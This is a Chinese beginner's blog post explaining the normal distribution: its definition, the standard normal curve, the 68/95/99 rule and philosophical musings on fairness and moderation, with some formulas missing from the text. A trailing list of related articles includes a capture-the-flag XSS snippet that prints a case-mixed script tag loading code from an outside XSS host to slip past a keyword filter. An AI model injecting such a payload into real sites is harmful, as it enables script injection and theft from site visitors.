【小白学机器学习16】 概率论的世界观2: 从正态分布去认识世界

ops/2024/10/25 14:12:38/

目录

1 从正态分布说起 

1.1 正态分布的定义

1.2 正态分布的名字

1.3 正态分布的广泛,和基础性

2 正态分布的公式和图形

2.1 正态分布

2.2 标准正态分布

3 正态分布的认识的3个层次

3.1 第1层次:个体的某个属性的样本值,服从正态分布

3.2 第2层次:抽样的误差,服从正态分布

3.3 第3层次:从标准正态分布去看,正态分布曲线就是概率曲线!

正态分布的本质就是概率

4 正态分布的特点

4.1 正态分布是客观的

4.2 万物不齐(从结果上看)

4.3 公平只是过程上的公平,而不能保证结果上的公平

4.4 钟形曲线,无限延申和逼近

4.5 中庸

4.6 动态平衡

4.7 规律是可用的,顺规律办事

4.7.1 不同的规律

4.7.2 使用规律


正态分布,概率论都是一种世界观

1 从正态分布说起 

1.1 正态分布的定义

正态分布(Normal distribution),又称为常态分布或高斯分布,通常记作。其中, 是正态分布的数学期望(均值), 是正态分布的方差。μ = 0,σ = 1的正态分布被称为标准正态分布 [1]。

1.2 正态分布的名字

  • 正态分布 :Normal distribution
  • 自然分布
  • 常态分布
  • 高斯分布

1.3 正态分布的广泛,和基础性

  • 正态分布,在自然界广泛存在
  • 无论是宏观的世界,还是很多微观的研究
  • 因此,正态分布也称为了大家心里对概率估计的一个基础。
  • 比如
  1. 我们假设一个我们不知道的事件:包含2个基本事件,我们默认为是1:1,也就是50%概率
  2. 我们对于一个我们不知道的随机变量 ,我们会默认这个随机变量是符合正态分布的规律的

2 正态分布的公式和图形

2.1 正态分布

2.2 标准正态分布

  • 期望值μ=0,即曲线图象对称轴为Y轴,标准差σ=1条件下的正态分布,记为N(0,1)。

3 正态分布的认识的3个层次

3.1 第1层次:个体的某个属性的样本值,服从正态分布

  • 比如某个属性,
  • 按照样本的数据,横轴全部展开,为数值/数值区间
  • 根据不同的数值/数值区间,统计其频度,作为Y坐标
  • 可以看到,这个属性的频度图,就符合正态分布的曲线形状

3.2 第2层次:抽样的误差,服从正态分布

  • 比如某个属性,每次抽样100个数据,统计每次抽样的平均值
  • 连续抽样50次,
  • 横轴是这50次的平均值
  • 纵轴是这些平均值的频度/出现次数
  • 也是符合正态分布的

3.3 第3层次:从标准正态分布去看,正态分布曲线就是概率曲线!

正态分布的本质就是概率

  • 标准正态分布曲线
  • 在 -1标准差,+1标准差内,发生的概率是68%
  • 在 -2标准差,+2标准差内,发生的概率是95%
  • 在 -3标准差,+3标准差内,发生的概率是99%

4 正态分布的特点

4.1 正态分布是客观的

  • 世界是客观的,是不以人们的意志想法为转移的
  • 大地与山川,喷泉也是一个钟形曲线
  • 世界观是多样的,且可能在不同的情境下有用,比如地心说在日常的小范围围观环境下很实用。但是研究宇宙得用日心说。但是正态分布是我们遇到很多随机的对象都符合的一种分布类型。

4.2 万物不齐(从结果上看)

  • 万物不齐
  • 万物应该是按正态分布/自然分布的居多,所以一定是钟形曲线,大地也是平地+山峦
  • 喷泉也是一个钟形曲线
  • 因为万物不齐,所以需要单独的去认识每个事物。
  • 反之,否则之需要单独认识1个事物就可以认识整体了,这对于现实认知,显然是荒谬的。
  • 庄子:理想? 希望万物齐一
  • 孟子:事实求是,认为万物不齐。
  • 万物不齐天地事,大道之行是中庸。

4.3 公平只是过程上的公平,而不能保证结果上的公平

  • 结果的正确/正义无法保证
  • 只能从过程的正确/正义上去保证
  • 反而从辩证的角度看,正是因为,过程是公平的随机,结果才是不公平的

4.4 钟形曲线,无限延申和逼近

  • 正态分布/自然分布也说了这个问题,一定是中间大,两头小。
  • 从标准正态分布曲线上看,而且钟形曲线是无限的,趋近两边的极限无限接近但是永远无限延申下去,理论上可以覆盖所有情况。但是概率确是无限小。
  • 中间的比例是最高的,这个是基于正态分布来说
  • 越到两边,占比越少,只至长尾

4.5 中庸

  • 中间的比例是最高的,这个是基于正态分布来说
  • 中间这个值,很可能就是均值,且因为占比高,更具有代表性,
  • 越道两边,占比越少,只至长尾
  • 同样的X轴宽度下/标准差长度下,中间的聚集目的更高,面积大/概率高。两边概率低。
  • 而且如果不引入其他变量,那么正态分布的均值,就是预测将来发生值最好的值!

4.6 动态平衡

  • 钟形曲线,从顶上到两边,都是曲线,是不稳定的,不是静态平衡,只能是动态平衡。
  • 逆水行舟,不进则退。

4.7 规律是可用的,顺规律办事

4.7.1 不同的规律

  • 天之道,损有余而补不足
  • 人之道,损不足而补有余
  • 这是两种规律,规律是相对客观的,不变的,需要遵循,且可以利用模仿的。
  • 人们自发的,都是按照人之道而行事的。
  • 而人们也可以行天道,按天道的规律做事。从而对抗人之道的规律和结果。

4.7.2 使用规律

  • 从使用规律上来说,人定胜天,是人可以利用规律,我是这么理解的


http://www.ppmy.cn/ops/128355.html

相关文章

neo4j 中日期时间 时间戳处理

### 使用指定格式(默认ISO)和指定时区(默认当前TZ),使用指定单位(默认ms)获取时间值的字符串表示形式(可选) 测试 return apoc.date.format(1729380807273,(ms),(yyyy-…

当遇到 502 错误(Bad Gateway)怎么办

很多安装雷池社区版的时候,配置完成,访问的时候可能会遇到当前问题,如何解决呢? 客户端,浏览器排查 1.刷新页面和清除缓存 首先尝试刷新页面,因为有时候 502 错误可能是由于网络临时波动导致服务器无法连…

基于neo4j的疫情信息管理系统

你是否想过,一个能清晰展示疫情传播路径和患者关系的系统有多强大?今天,就来介绍一套专为疫情信息设计的知识图谱管理系统,它利用Neo4j图数据库构建,帮助你轻松掌握疫情动态和患者之间的潜在联系,让疫情防控…

Java中的LinkedList和ArrayList以及HashMap和TreeMap

在Java的集合框架中,LinkedList和ArrayList都是用来存储一组对象的容器,但它们在内部实现、性能特点等方面存在着一些差异。 ## 一、内部实现 1. **ArrayList** - ArrayList是基于数组实现的动态数组。它在内存中是一块连续的存储空间。当创建ArrayL…

移动开发(五):.NET MAUI中自定义主题设置

目录 一、.NET MAUI主题设置原理 二、.NET MAUI主题设置案例 2.1 创建主题文件 2.2 修改App.xaml 文件 2.3 设置默认主题的三种方式 2.4 通过按钮切换主题 三、.NET MAUI主题设置技巧 四、总结 今天给大家分享.NET MAUI应用中如何自定义主题,提升APP本身个性…

数据结构——树——二叉树——大小堆

目录 1>>导言 2>>树 2.1>>树的相关术语 2.2>>树的表示和应用场景 3>>二叉树 3.1>>完全二叉树 3.2>>大小根堆 4>>结语 1>>导言 上篇小编将队列的内容给大家讲完了,这篇要步入新的篇章,请宝…

Nginx服务器反向代理MinIO配置

文章目录 配置请求代理到该域名的根目录请求代理到该域名的非根目录 参考网址 配置 请求代理到该域名的根目录 # 代理minio 上传server {listen 80;listen [::]:80;server_name minio.example.net;# 允许在HTTP头中使用特殊字符ignore_invalid_headers off;# 禁用代理…

CTFHUB技能树之XSS——过滤关键词

开启靶场&#xff0c;打开链接&#xff1a; 看上去跟上一题应该差不多&#xff0c;应该只是添加多点过滤规则吧 直接拿xss平台的代码试试&#xff1a; <sCRiPt sRC//xs.pe/6b6></sCrIpT> 这时候突然听到xss平台的上线语音提醒&#xff1a; 成功得到flag&#xff1…